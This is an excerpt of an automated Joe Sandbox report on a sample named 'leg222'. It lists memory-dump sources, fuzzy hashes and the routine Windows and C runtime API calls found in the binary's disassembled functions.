                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                          • Opcode ID: 66f7aa9e9d3cb06b185eb938dc23e7a483d83fd24754a41da8a014ea8abca314
                                                                                                                                                                                                                                          • Instruction ID: d1ccd4a2e7fd68b7868dc159ea5e90697750ffc33a5a6e6519bc39453b8142ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f7aa9e9d3cb06b185eb938dc23e7a483d83fd24754a41da8a014ea8abca314
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B71D272944209ABDF20DFA88D41FAE7BB9EF49350F2A405EE855B7292D735DC00C7A1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00AA1C8F,?,00000001,00000000,00000002,00000001,?,00AA1C8F,?), ref: 00AAABFA
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00AAAC26
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00AA1C8F,?,00000000,00AD1DDE,009140B8,?,?,?,00AA6B2C), ref: 00AAAC65
                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00AA1C8F,?,00000000,00AD1DDE,009140B8), ref: 00AAAC82
                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00AA1C8F,?,00000000,00AD1DDE,009140B8), ref: 00AAACC1
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00AAACDE
                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00AA1C8F,?,00000000,00AD1DDE,009140B8), ref: 00AAAD20
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00AA1C8F,?,00000000,00AD1DDE,009140B8), ref: 00AAAD43
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                                                                                          • Opcode ID: a930df85d752aba0ce5d1de132e70f95c70fdd75182d19192bb1e3901cc235c5
                                                                                                                                                                                                                                          • Instruction ID: 03ca0b6910e73053223f66016be1da909b33a0c03ed08ce96902294fb77a28b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a930df85d752aba0ce5d1de132e70f95c70fdd75182d19192bb1e3901cc235c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6651CE7260020AABEF209FA4CC45FAB7BF9EB66755F114529F9059B1A0E735CC00DB62
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA618D
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA61AB
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA61CC
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA621C
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA6246
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA625F
                                                                                                                                                                                                                                            • Part of subcall function 00AA1930: ___std_exception_copy.LIBVCRUNTIME ref: 00AA196C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 728164013-0
                                                                                                                                                                                                                                          • Opcode ID: 3e518410d3ff8a5241eef71f6f5c38a7dccfc291723632661538a411be0fabc6
                                                                                                                                                                                                                                          • Instruction ID: 5d03b88794a4cd7f82259a660d6b3be7a917cc298f11ad1584336df1b75d46ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e518410d3ff8a5241eef71f6f5c38a7dccfc291723632661538a411be0fabc6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F82125319082118FC761EF14E990A6FB7B0EB86320F19065EE894572D2DF35AD4ECF82
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA5AED
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA5B0B
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5B2C
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5B7C
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA5BA6
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5BBF
                                                                                                                                                                                                                                            • Part of subcall function 00AA1930: ___std_exception_copy.LIBVCRUNTIME ref: 00AA196C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 728164013-0
                                                                                                                                                                                                                                          • Opcode ID: 09e275170ce4bb87d6cc919b3881d80fdc59209a2d28dee4d43a5ef705ab6b03
                                                                                                                                                                                                                                          • Instruction ID: 713552c00619bf25e3b2ef064bc2123b4d28d8246d96b983dcd27ba75ff3fd88
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09e275170ce4bb87d6cc919b3881d80fdc59209a2d28dee4d43a5ef705ab6b03
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9421F0359046118BC721EF24EC9096FB3A0FB82361F15065DE885972E1EF31ED0ACBE6
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00AAE231,00AAC7EC,00AAB8E6), ref: 00AAE248
                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AAE256
                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AAE26F
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00AAE231,00AAC7EC,00AAB8E6), ref: 00AAE2C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                          • Opcode ID: 083c7cb4235dd5a86b62c558dd1be6c30a653d2c590881f45f7c6089645e3969
                                                                                                                                                                                                                                          • Instruction ID: 0d9c8672f5396ad2ca4a47172c9ad55d9769d40d9f0cf8c04a09b59eaf2952bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 083c7cb4235dd5a86b62c558dd1be6c30a653d2c590881f45f7c6089645e3969
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501243260A6111EAF28A7F4BCC9BA73749EB07775720433AF010530F0EF514C0A5181
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8B0E21E6,?,?,00000000,00AC8753,000000FF,?,00AB6A20,00000002,?,00AB69F4,00AB30CA), ref: 00AB6AC5
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AB6AD7
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00AC8753,000000FF,?,00AB6A20,00000002,?,00AB69F4,00AB30CA), ref: 00AB6AF9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 0ac32a624c21ac38193e6b19940245fef2ff734b959d47450b433f3354898e4d
                                                                                                                                                                                                                                          • Instruction ID: 48c90ad7134fce2ce6d7a00387a899bcf12b5155370d81889fa11fbc81a01ff3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ac32a624c21ac38193e6b19940245fef2ff734b959d47450b433f3354898e4d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3016236944619AFDB11CF90CC05FBEBBB8FB04B55F058539E816F2290DBB89901CA91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00ABEDC9
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00ABEE8A
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00ABEEF1
                                                                                                                                                                                                                                            • Part of subcall function 00AB9C27: HeapAlloc.KERNEL32(00000000,00AC004D,?,?,00AC004D,00000220,?,00000010,?), ref: 00AB9C59
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00ABEF06
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00ABEF16
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1096550386-0
                                                                                                                                                                                                                                          • Opcode ID: 5109adb17a14e44e5fae51437cd0619e9fdbf3fe91c8211184e2e89fa435cee2
                                                                                                                                                                                                                                          • Instruction ID: 77ad847dd28ffbdd4ae6ddd6c213e36bcb92cca8360d773115c6360771f63ea9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5109adb17a14e44e5fae51437cd0619e9fdbf3fe91c8211184e2e89fa435cee2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4517A7260021AAFEB25DFA4DD85EFB3AADEB04750F190129FD08DB153EB70CC1096A1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00AA93B6
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA93C0
                                                                                                                                                                                                                                            • Part of subcall function 00AA1AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AA1ACF
                                                                                                                                                                                                                                            • Part of subcall function 00AA1AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA1AEA
                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 00AA93FA
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA9411
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA9431
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 712880209-0
                                                                                                                                                                                                                                          • Opcode ID: 89dbd1be4583ae9e2958ac5bec73976fc06a0f36b83ee97a8a7e218521aaf38e
                                                                                                                                                                                                                                          • Instruction ID: 0aef1139455e5ecddfc0aa983080a240ec3112495feabdc8239cd4ffab6b69fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89dbd1be4583ae9e2958ac5bec73976fc06a0f36b83ee97a8a7e218521aaf38e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F411E1759142189BCB00AF64CA41BAF77B4BF46720F15040DE405AB2C1DFB4AE018790
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00AA7C83
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA7C8D
                                                                                                                                                                                                                                            • Part of subcall function 00AA1AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AA1ACF
                                                                                                                                                                                                                                            • Part of subcall function 00AA1AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA1AEA
                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 00AA7CC7
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA7CDE
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA7CFE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 712880209-0
                                                                                                                                                                                                                                          • Opcode ID: 5b29cf06ce27c395a6fa90de724a38a0ca140a49f191e5f4c9bcfaa2e5f0981e
                                                                                                                                                                                                                                          • Instruction ID: bc65b947d186b3fa62f387c8719afa8448a1b4cb48ebc00968f84e8ea2580eb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b29cf06ce27c395a6fa90de724a38a0ca140a49f191e5f4c9bcfaa2e5f0981e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F511B1759042299FCB15EFA8CE01AAF7BF4AF46320F14051EE405A72C1DFB49E018B91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00AA903E
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA9049
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA90B7
                                                                                                                                                                                                                                            • Part of subcall function 00AA919A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AA91B2
                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00AA9064
                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 00AA907A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                          • Opcode ID: d062542936ffbe887e04e796ccac9f343da3cfa20be17be20a66e9dbcc19f8fa
                                                                                                                                                                                                                                          • Instruction ID: 70e120857400f78f5dff896acd1961f30ee9b9584c76a55bfb1ac7af8d122626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d062542936ffbe887e04e796ccac9f343da3cfa20be17be20a66e9dbcc19f8fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6018F79A002259FCB06EB60D95597E7BB2FF86340B19410DE9155B3C1CF786E42CBD1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00AA22CD
                                                                                                                                                                                                                                            • Part of subcall function 00AABCA0: RaiseException.KERNEL32(E06D7363,00000001,00000003,00AABBC3,?,?,?,?,00AABBC3,?,00AD40FC,?), ref: 00AABD00
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                          • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                                          • Opcode ID: e62b23050d7c2b757650498233f8776a46b2c13ba95578b857df252fd34fbc18
                                                                                                                                                                                                                                          • Instruction ID: 1c61099edc196a14be06d02280a48bd87578e23e3e070d3edd70aa57299465bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e62b23050d7c2b757650498233f8776a46b2c13ba95578b857df252fd34fbc18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4511D6B29147046FC710DF6CC841FDAB3E8AF56310F14862EFA5597281F774A954CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00AAF333,00000000,00000001,00BB73CC,?,?,?,00AAF4D6,00000004,InitializeCriticalSectionEx,00ACBE28,InitializeCriticalSectionEx), ref: 00AAF38F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00AAF333,00000000,00000001,00BB73CC,?,?,?,00AAF4D6,00000004,InitializeCriticalSectionEx,00ACBE28,InitializeCriticalSectionEx,00000000,?,00AAF28D), ref: 00AAF399
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00AAE1A3), ref: 00AAF3C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                          • Opcode ID: f3e150ef9d8be8ca127e068749bf439d40292eb0d38f7d37975e594da24c5b6c
                                                                                                                                                                                                                                          • Instruction ID: 2e4d9ebbf3c300720f2e7233fe52ce77fee2b002e3f2023deaeedfb28647c2f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3e150ef9d8be8ca127e068749bf439d40292eb0d38f7d37975e594da24c5b6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E04830240208BBEF111BE1ED06F693F59AF11B98F110031FA0DED0E1D77698169596
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(8B0E21E6,00000010,00000000,?), ref: 00ABBE99
                                                                                                                                                                                                                                            • Part of subcall function 00ABF13E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00ABEEE7,?,00000000,-00000008), ref: 00ABF1EA
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00ABC0F4
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00ABC13C
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00ABC1DF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
